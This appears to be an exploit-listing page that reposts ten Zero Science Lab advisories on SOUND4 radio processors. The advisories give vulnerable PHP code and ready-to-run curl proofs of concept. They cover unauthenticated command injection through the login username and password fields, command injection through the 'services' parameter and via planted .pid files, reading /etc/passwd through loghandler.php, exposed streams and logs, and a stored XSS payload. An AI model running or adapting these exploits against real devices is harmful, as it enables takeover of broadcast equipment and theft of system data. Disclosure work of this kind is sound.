Latest exploits :: CodePwn

<pre><code> SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (traceroute.php) Conditional Command Injection Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: FM/HD Radio Processing: Impact/Pulse/First (Version 2: 1.1/2.15) Impact/Pulse/First (Version 1: 2.1/1.69) Impact/Pulse Eco 1.16 Voice Processing: BigVoice4 1.2 BigVoice2 1.30 Web-Audio Streaming: Stream 1.1/2.4.29 Watermarking: WM2 (Kantar Media) 1.11 Summary: The SOUND4 IMPACT introduces an innovative process - mono and stereo parts of the signal are processed separately to obtain perfect consistency in terms of both sound and level. Therefore, in moving reception, when the FM receiver switches from stereo to mono and back to stereo, the sound variations and changes in level are reduced by over 90%. In the SOUND4 IMPACT processing chain, the stereo expander can be used substantially without any limitations. With its advanced functionalities and impressive versatility, SOUND4 PULSE gives clients the ultimate price - performance ratio, providing much more than just a processor. Flexible and powerful, it ensures perfect sound quality and full compatibility with radio broadcasting standards and can be used simultaneously for FM and HD, DAB, DRM or streaming. SOUND4 FIRST provides all the most important functionalities you need in an FM/HD processor and sets the bar high both in terms of performance and affordability. Designed to deliver a sound of uncompromising quality, this tool gives you 2-band processing, a digital stereo generator and an IMPACT Clipper. Desc: This vulnerability allows a local authenticated user to create a file in the /tmp directory that contains malicious commands. The file must have the filename ending with .traceroute.pid, and the commands in the file can only be executed once by an external unauthenticated attacker. By calling the vulnerable script and making a single HTTP POST request, the attacker can gain command execution on the system. After the request is made, the file containing the malicious commands will be deleted. ------------------------------------------------------------------------- /var/www/traceroute.php: ------------------------ 02: if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST['traceroute_host']) && isset($_POST['networkid'])) { 03: $pidfilename="/tmp/" . $_POST['networkid'] . ".traceroute.pid"; 04: if( file_exists($pidfilename)) { 05: $procid=file_get_contents($pidfilename); 06: shell_exec("pkill -P ".$procid); 07: } ... ... 29: unlink($pidfilename); 30: exit(); ------------------------------------------------------------------------- Tested on: Apache/2.4.25 (Unix) OpenSSL/1.0.2k PHP/7.1.1 GNU/Linux 5.10.43 (armv7l) GNU/Linux 4.9.228 (armv7l) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2022-5740 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5740.php 26.09.2022 -- #On the server > echo ";id>/var/www/b" > /tmp/251.traceroute.pid #External > curl -XPOST -sk https://RADIO/traceroute.php --data "traceroute_host=t00t&networkid=251" > curl -XPOST -sk https://RADIO/b uid=33(www-data) gid=33(www-data) groups=29(audio),33(www-data) </code></pre>

<pre><code> SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (username) Unauthenticated Command Injection Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: FM/HD Radio Processing: Impact/Pulse/First (Version 2: 1.1/2.15) Impact/Pulse/First (Version 1: 2.1/1.69) Impact/Pulse Eco 1.16 Voice Processing: BigVoice4 1.2 BigVoice2 1.30 Web-Audio Streaming: Stream 1.1/2.4.29 Watermarking: WM2 (Kantar Media) 1.11 Summary: The SOUND4 IMPACT introduces an innovative process - mono and stereo parts of the signal are processed separately to obtain perfect consistency in terms of both sound and level. Therefore, in moving reception, when the FM receiver switches from stereo to mono and back to stereo, the sound variations and changes in level are reduced by over 90%. In the SOUND4 IMPACT processing chain, the stereo expander can be used substantially without any limitations. With its advanced functionalities and impressive versatility, SOUND4 PULSE gives clients the ultimate price - performance ratio, providing much more than just a processor. Flexible and powerful, it ensures perfect sound quality and full compatibility with radio broadcasting standards and can be used simultaneously for FM and HD, DAB, DRM or streaming. SOUND4 FIRST provides all the most important functionalities you need in an FM/HD processor and sets the bar high both in terms of performance and affordability. Designed to deliver a sound of uncompromising quality, this tool gives you 2-band processing, a digital stereo generator and an IMPACT Clipper. Desc: The application suffers from an unauthenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the 'username' HTTP POST parameter through index.php and login.php script. ======================================================================== /var/www/login.php: ------------------- 09: if (isset($_POST['username']) && isset($_POST['password'])) { 10: 11: $ret = -1; 12: // remarque: Check Password for broken, only admin/admin as valid user/password 13: exec('echo ' . $_POST['password'] . ' | /opt/sound4/sound4server _check_pwd_ ' .'"'.$_POST['username'].'";',$out,$ret); ======================================================================== Tested on: Apache/2.4.25 (Unix) OpenSSL/1.0.2k PHP/7.1.1 GNU/Linux 5.10.43 (armv7l) GNU/Linux 4.9.228 (armv7l) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2022-5739 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5739.php 26.09.2022 -- > curl --fail -XPOST -sko nul https://RADIOGAGA/index.php --data "username=`id>/var/www/j`&password=ZSL" && curl -sk https://RADIOGAGA/j uid=33(www-data) gid=33(www-data) groups=29(audio),33(www-data) </code></pre>

<pre><code> SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (password) Unauthenticated Command Injection Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: FM/HD Radio Processing: Impact/Pulse/First (Version 2: 1.1/2.15) Impact/Pulse/First (Version 1: 2.1/1.69) Impact/Pulse Eco 1.16 Voice Processing: BigVoice4 1.2 BigVoice2 1.30 Web-Audio Streaming: Stream 1.1/2.4.29 Watermarking: WM2 (Kantar Media) 1.11 Summary: The SOUND4 IMPACT introduces an innovative process - mono and stereo parts of the signal are processed separately to obtain perfect consistency in terms of both sound and level. Therefore, in moving reception, when the FM receiver switches from stereo to mono and back to stereo, the sound variations and changes in level are reduced by over 90%. In the SOUND4 IMPACT processing chain, the stereo expander can be used substantially without any limitations. With its advanced functionalities and impressive versatility, SOUND4 PULSE gives clients the ultimate price - performance ratio, providing much more than just a processor. Flexible and powerful, it ensures perfect sound quality and full compatibility with radio broadcasting standards and can be used simultaneously for FM and HD, DAB, DRM or streaming. SOUND4 FIRST provides all the most important functionalities you need in an FM/HD processor and sets the bar high both in terms of performance and affordability. Designed to deliver a sound of uncompromising quality, this tool gives you 2-band processing, a digital stereo generator and an IMPACT Clipper. Desc: The application suffers from an unauthenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the 'password' HTTP POST parameter through index.php and login.php script. ======================================================================== /var/www/login.php: ------------------- 09: if (isset($_POST['username']) && isset($_POST['password'])) { 10: 11: $ret = -1; 12: // remarque: Check Password for broken, only admin/admin as valid user/password 13: exec('echo ' . $_POST['password'] . ' | /opt/sound4/sound4server _check_pwd_ ' .'"'.$_POST['username'].'";',$out,$ret); ======================================================================== Tested on: Apache/2.4.25 (Unix) OpenSSL/1.0.2k PHP/7.1.1 GNU/Linux 5.10.43 (armv7l) GNU/Linux 4.9.228 (armv7l) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2022-5738 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5738.php 26.09.2022 -- > curl --fail -XPOST -sko nul https://RADIOGUGU/index.php --data "username=ZSL&password=`id>/var/www/g`" && curl -sk https://RADIOGUGU/g uid=33(www-data) gid=33(www-data) groups=29(audio),33(www-data) </code></pre>

<pre><code> SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (services) Authenticated Command Injection Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: FM/HD Radio Processing: Impact/Pulse/First (Version 2: 1.1/2.15) Impact/Pulse/First (Version 1: 2.1/1.69) Impact/Pulse Eco 1.16 Voice Processing: BigVoice4 1.2 BigVoice2 1.30 Web-Audio Streaming: Stream 1.1/2.4.29 Watermarking: WM2 (Kantar Media) 1.11 Summary: The SOUND4 IMPACT introduces an innovative process - mono and stereo parts of the signal are processed separately to obtain perfect consistency in terms of both sound and level. Therefore, in moving reception, when the FM receiver switches from stereo to mono and back to stereo, the sound variations and changes in level are reduced by over 90%. In the SOUND4 IMPACT processing chain, the stereo expander can be used substantially without any limitations. With its advanced functionalities and impressive versatility, SOUND4 PULSE gives clients the ultimate price - performance ratio, providing much more than just a processor. Flexible and powerful, it ensures perfect sound quality and full compatibility with radio broadcasting standards and can be used simultaneously for FM and HD, DAB, DRM or streaming. SOUND4 FIRST provides all the most important functionalities you need in an FM/HD processor and sets the bar high both in terms of performance and affordability. Designed to deliver a sound of uncompromising quality, this tool gives you 2-band processing, a digital stereo generator and an IMPACT Clipper. Desc: An authenticated command injection vulnerability exists in the www-data-handler.php script at line 20, where the 'services' HTTP POST parameter is passed as an argument to the system command "/usr/local/bin/www-data-handler.sh --restartsrv". This allows an attacker to inject arbitrary system commands into the 'services' parameter, which are then executed by the script with the privileges of the 'www-data' user. ======================================================================== /var/www/www-data-handler.php: ------------------------------ 18: } else if(isset($_POST['services'])&&$_POST['services']!='') { 19: $ret=-1; 20: exec("/usr/local/bin/www-data-handler.sh --restartsrv ".$_POST['services'],$out,$ret); 21: echo $ret; 22: exit; 23: } ======================================================================== Tested on: Apache/2.4.25 (Unix) OpenSSL/1.0.2k PHP/7.1.1 GNU/Linux 5.10.43 (armv7l) GNU/Linux 4.9.228 (armv7l) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2022-5737 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5737.php 26.09.2022 -- > curl --fail -XPOST -sko nul \ 'https://RADIOGUGA/www-data-handler.php' \ -H 'Cookie: PHPSESSID=fnlqhsd916g59uob4fgact97bd' \ --data "services=;id>/var/www/m" \ && curl -sk 'https://RADIOGUGA/m' uid=33(www-data) gid=33(www-data) groups=29(audio),33(www-data) </code></pre>

<pre><code> SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (PHPTail) Unauthenticated File Disclosure Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: FM/HD Radio Processing: Impact/Pulse/First (Version 2: 1.1/2.15) Impact/Pulse/First (Version 1: 2.1/1.69) Impact/Pulse Eco 1.16 Voice Processing: BigVoice4 1.2 BigVoice2 1.30 Web-Audio Streaming: Stream 1.1/2.4.29 Watermarking: WM2 (Kantar Media) 1.11 Summary: The SOUND4 IMPACT introduces an innovative process - mono and stereo parts of the signal are processed separately to obtain perfect consistency in terms of both sound and level. Therefore, in moving reception, when the FM receiver switches from stereo to mono and back to stereo, the sound variations and changes in level are reduced by over 90%. In the SOUND4 IMPACT processing chain, the stereo expander can be used substantially without any limitations. With its advanced functionalities and impressive versatility, SOUND4 PULSE gives clients the ultimate price - performance ratio, providing much more than just a processor. Flexible and powerful, it ensures perfect sound quality and full compatibility with radio broadcasting standards and can be used simultaneously for FM and HD, DAB, DRM or streaming. SOUND4 FIRST provides all the most important functionalities you need in an FM/HD processor and sets the bar high both in terms of performance and affordability. Designed to deliver a sound of uncompromising quality, this tool gives you 2-band processing, a digital stereo generator and an IMPACT Clipper. Desc: The application suffers from an unauthenticated file disclosure vulnerability. Using the 'file' GET parameter attackers can disclose arbitrary files on the affected device and disclose sensitive and system information. ======================================================================== /usr/cgi-bin/loghandler.php: ---------------------------- 05: require 'phptail.php'; 06: /** 07: * Initilize a new instance of PHPTail 08: * @var PHPTail 09: */ 10: if(isset($_GET['file'])) { 11: $file=$_GET['file']; 12: $file_display=$_GET['file_display']; 13: } else { 14: $file=getenv("PATH_TRANSLATED"); 15: $file_display="SOUND4 Log: " . getenv("PATH_INFO"); 16: } 17: $tail = new PHPTail($file, $file_display); ======================================================================== /usr/cgi-bin/phptail.php: ------------------------- 71: $data = array(); 72: if($maxLength > 0) { 73: 74: $fp = fopen($this->log, 'r'); 75: fseek($fp, -$maxLength , SEEK_END); 76: $data = explode("\n", fread($fp, $maxLength)); 77: 78: } 79: /** 80: * If the last entry in the array is an empty string lets remove it. 81: */ 82: if(end($data) == "") { 83: array_pop($data); 84: } 85: return json_encode(array("size" => $fsize, "data" => $data)); ======================================================================== Tested on: Apache/2.4.25 (Unix) OpenSSL/1.0.2k PHP/7.1.1 GNU/Linux 5.10.43 (armv7l) GNU/Linux 4.9.228 (armv7l) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2022-5736 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5736.php 26.09.2022 -- > curl -k "https://RADIOGAGA/cgi-bin/loghandler.php?ajax=251&file=/mnt/old-root/etc/passwd" | python -m json.tool { "size": 519, "data": [ "root:x:0:0:root:/root:/bin/sh", "daemon:x:1:1:daemon:/usr/sbin:/bin/false", "bin:x:2:2:bin:/bin:/bin/false", "sys:x:3:3:sys:/dev:/bin/false", "sync:x:4:100:sync:/bin:/bin/sync", "mail:x:8:8:mail:/var/spool/mail:/bin/false", "www-data:x:33:33:www-data:/var/www:/bin/false", "operator:x:37:37:Operator:/var:/bin/false", "nobody:x:99:99:nobody:/home:/bin/false", "sound4:x:1000:1000::/home/sound4:/bin/sh", "avahi:x:1001:1001::/:/bin/false", "dbus:x:1002:1002:DBus messagebus user:/var/run/dbus:/bin/false", "sshd:x:1003:1004:SSH drop priv user:/:/bin/false" ] } </code></pre>

<pre><code> SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (ping.php) Conditional Command Injection Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: FM/HD Radio Processing: Impact/Pulse/First (Version 2: 1.1/2.15) Impact/Pulse/First (Version 1: 2.1/1.69) Impact/Pulse Eco 1.16 Voice Processing: BigVoice4 1.2 BigVoice2 1.30 Web-Audio Streaming: Stream 1.1/2.4.29 Watermarking: WM2 (Kantar Media) 1.11 Summary: The SOUND4 IMPACT introduces an innovative process - mono and stereo parts of the signal are processed separately to obtain perfect consistency in terms of both sound and level. Therefore, in moving reception, when the FM receiver switches from stereo to mono and back to stereo, the sound variations and changes in level are reduced by over 90%. In the SOUND4 IMPACT processing chain, the stereo expander can be used substantially without any limitations. With its advanced functionalities and impressive versatility, SOUND4 PULSE gives clients the ultimate price - performance ratio, providing much more than just a processor. Flexible and powerful, it ensures perfect sound quality and full compatibility with radio broadcasting standards and can be used simultaneously for FM and HD, DAB, DRM or streaming. SOUND4 FIRST provides all the most important functionalities you need in an FM/HD processor and sets the bar high both in terms of performance and affordability. Designed to deliver a sound of uncompromising quality, this tool gives you 2-band processing, a digital stereo generator and an IMPACT Clipper. Desc: This vulnerability allows a local authenticated user to create a file in the /tmp directory that contains malicious commands. The file must have the filename ending with .ping.pid, and the commands in the file can only be executed once by an external unauthenticated attacker. By calling the vulnerable script and making a single HTTP POST request, the attacker can gain command execution on the system. After the request is made, the file containing the malicious commands will be deleted. ------------------------------------------------------------------------- /var/www/ping.php: ------------------ 02: if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST['ping_host']) && isset($_POST['networkid'])) { 03: $pidfilename="/tmp/" . $_POST['networkid'] . ".ping.pid"; 04: if( file_exists($pidfilename)) { 05: $procid=file_get_contents($pidfilename); 06: shell_exec("pkill -P ".$procid); 07: } ... ... 29: unlink($pidfilename); 30: exit(); ------------------------------------------------------------------------- Tested on: Apache/2.4.25 (Unix) OpenSSL/1.0.2k PHP/7.1.1 GNU/Linux 5.10.43 (armv7l) GNU/Linux 4.9.228 (armv7l) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2022-5735 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5735.php 26.09.2022 -- #On the server > echo ";id>/var/www/b" > /tmp/251.ping.pid #External > curl -XPOST -sk https://RADIO/ping.php --data "ping_host=r00t&networkid=251" > curl -XPOST -sk https://RADIO/b uid=33(www-data) gid=33(www-data) groups=29(audio),33(www-data) </code></pre>

<pre><code> SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Unauthenticated Radio Stream Disclosure Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: FM/HD Radio Processing: Impact/Pulse/First (Version 2: 1.1/2.15) Impact/Pulse/First (Version 1: 2.1/1.69) Impact/Pulse Eco 1.16 Voice Processing: BigVoice4 1.2 BigVoice2 1.30 Web-Audio Streaming: Stream 1.1/2.4.29 Watermarking: WM2 (Kantar Media) 1.11 Summary: The SOUND4 IMPACT introduces an innovative process - mono and stereo parts of the signal are processed separately to obtain perfect consistency in terms of both sound and level. Therefore, in moving reception, when the FM receiver switches from stereo to mono and back to stereo, the sound variations and changes in level are reduced by over 90%. In the SOUND4 IMPACT processing chain, the stereo expander can be used substantially without any limitations. With its advanced functionalities and impressive versatility, SOUND4 PULSE gives clients the ultimate price - performance ratio, providing much more than just a processor. Flexible and powerful, it ensures perfect sound quality and full compatibility with radio broadcasting standards and can be used simultaneously for FM and HD, DAB, DRM or streaming. SOUND4 FIRST provides all the most important functionalities you need in an FM/HD processor and sets the bar high both in terms of performance and affordability. Designed to deliver a sound of uncompromising quality, this tool gives you 2-band processing, a digital stereo generator and an IMPACT Clipper. Desc: The application suffers from an unauthenticated live stream disclosure when webplay or ffmpeg scripts are called. Tested on: Apache/2.4.25 (Unix) OpenSSL/1.0.2k PHP/7.1.1 GNU/Linux 5.10.43 (armv7l) GNU/Linux 4.9.228 (armv7l) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2022-5734 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5734.php 26.09.2022 -- 1. https://RADIO/webplay/mp3/128 2. https://RADIO/cgi-bin/ffmpeg.cgi?codec=mp3&bitrate=128 </code></pre>

<pre><code> SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (dns.php) Conditional Command Injection Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: FM/HD Radio Processing: Impact/Pulse/First (Version 2: 1.1/2.15) Impact/Pulse/First (Version 1: 2.1/1.69) Impact/Pulse Eco 1.16 Voice Processing: BigVoice4 1.2 BigVoice2 1.30 Web-Audio Streaming: Stream 1.1/2.4.29 Watermarking: WM2 (Kantar Media) 1.11 Summary: The SOUND4 IMPACT introduces an innovative process - mono and stereo parts of the signal are processed separately to obtain perfect consistency in terms of both sound and level. Therefore, in moving reception, when the FM receiver switches from stereo to mono and back to stereo, the sound variations and changes in level are reduced by over 90%. In the SOUND4 IMPACT processing chain, the stereo expander can be used substantially without any limitations. With its advanced functionalities and impressive versatility, SOUND4 PULSE gives clients the ultimate price - performance ratio, providing much more than just a processor. Flexible and powerful, it ensures perfect sound quality and full compatibility with radio broadcasting standards and can be used simultaneously for FM and HD, DAB, DRM or streaming. SOUND4 FIRST provides all the most important functionalities you need in an FM/HD processor and sets the bar high both in terms of performance and affordability. Designed to deliver a sound of uncompromising quality, this tool gives you 2-band processing, a digital stereo generator and an IMPACT Clipper. Desc: This vulnerability allows a local authenticated user to create a file in the /tmp directory that contains malicious commands. The file must have the filename ending with .dns.pid, and the commands in the file can only be executed once by an external unauthenticated attacker. By calling the vulnerable script and making a single HTTP POST request, the attacker can gain command execution on the system. After the request is made, the file containing the malicious commands will be deleted. ------------------------------------------------------------------------- /var/www/dns.php: ----------------- 02: if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST['dns_host']) && isset($_POST['networkid'])) { 03: $pidfilename="/tmp/" . $_POST['networkid'] . ".dns.pid"; 04: if( file_exists($pidfilename)) { 05: $procid=file_get_contents($pidfilename); 06: shell_exec("pkill -P ".$procid); 07: } ... ... 29: unlink($pidfilename); 30: exit(); ------------------------------------------------------------------------- Tested on: Apache/2.4.25 (Unix) OpenSSL/1.0.2k PHP/7.1.1 GNU/Linux 5.10.43 (armv7l) GNU/Linux 4.9.228 (armv7l) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2022-5733 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5733.php 26.09.2022 -- #On the server > echo ";id>/var/www/b" > /tmp/251.dns.pid #External > curl -XPOST -sk https://RADIO/dns.php --data "dns_host=m00t&networkid=251" > curl -XPOST -sk https://RADIO/b uid=33(www-data) gid=33(www-data) groups=29(audio),33(www-data) </code></pre>

<pre><code> SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (Index of /log) Information Disclosure Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: FM/HD Radio Processing: Impact/Pulse/First (Version 2: 1.1/2.15) Impact/Pulse/First (Version 1: 2.1/1.69) Impact/Pulse Eco 1.16 Voice Processing: BigVoice4 1.2 BigVoice2 1.30 Web-Audio Streaming: Stream 1.1/2.4.29 Watermarking: WM2 (Kantar Media) 1.11 Summary: The SOUND4 IMPACT introduces an innovative process - mono and stereo parts of the signal are processed separately to obtain perfect consistency in terms of both sound and level. Therefore, in moving reception, when the FM receiver switches from stereo to mono and back to stereo, the sound variations and changes in level are reduced by over 90%. In the SOUND4 IMPACT processing chain, the stereo expander can be used substantially without any limitations. With its advanced functionalities and impressive versatility, SOUND4 PULSE gives clients the ultimate price - performance ratio, providing much more than just a processor. Flexible and powerful, it ensures perfect sound quality and full compatibility with radio broadcasting standards and can be used simultaneously for FM and HD, DAB, DRM or streaming. SOUND4 FIRST provides all the most important functionalities you need in an FM/HD processor and sets the bar high both in terms of performance and affordability. Designed to deliver a sound of uncompromising quality, this tool gives you 2-band processing, a digital stereo generator and an IMPACT Clipper. Desc: The application is vulnerable to sensitive directory indexing / information disclosure vulnerability. An unauthenticated attacker can visit the log directory and disclose the server's log files containing sensitive and system information. Tested on: Apache/2.4.25 (Unix) OpenSSL/1.0.2k PHP/7.1.1 GNU/Linux 5.10.43 (armv7l) GNU/Linux 4.9.228 (armv7l) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2022-5732 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5732.php 26.09.2022 -- > curl -k "https://RADIO/log/ </code></pre>

<pre><code> SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (username) Stored Cross-Site Scripting Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: FM/HD Radio Processing: Impact/Pulse/First (Version 2: 1.1/2.15) Impact/Pulse/First (Version 1: 2.1/1.69) Impact/Pulse Eco 1.16 Voice Processing: BigVoice4 1.2 BigVoice2 1.30 Web-Audio Streaming: Stream 1.1/2.4.29 Watermarking: WM2 (Kantar Media) 1.11 Summary: The SOUND4 IMPACT introduces an innovative process - mono and stereo parts of the signal are processed separately to obtain perfect consistency in terms of both sound and level. Therefore, in moving reception, when the FM receiver switches from stereo to mono and back to stereo, the sound variations and changes in level are reduced by over 90%. In the SOUND4 IMPACT processing chain, the stereo expander can be used substantially without any limitations. With its advanced functionalities and impressive versatility, SOUND4 PULSE gives clients the ultimate price - performance ratio, providing much more than just a processor. Flexible and powerful, it ensures perfect sound quality and full compatibility with radio broadcasting standards and can be used simultaneously for FM and HD, DAB, DRM or streaming. SOUND4 FIRST provides all the most important functionalities you need in an FM/HD processor and sets the bar high both in terms of performance and affordability. Designed to deliver a sound of uncompromising quality, this tool gives you 2-band processing, a digital stereo generator and an IMPACT Clipper. Desc: The application suffers from an unauthenticated stored XSS vulnerability that results in stored JS code and authentication bypass. The issue is triggered when input passed to the 'username' parameter is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Tested on: Apache/2.4.25 (Unix) OpenSSL/1.0.2k PHP/7.1.1 GNU/Linux 5.10.43 (armv7l) GNU/Linux 4.9.228 (armv7l) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2022-5731 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5731.php 26.09.2022 -- POST /index.php HTTP/1.1 username="><script>confirm(251)</script>&password=zeroscience" </code></pre>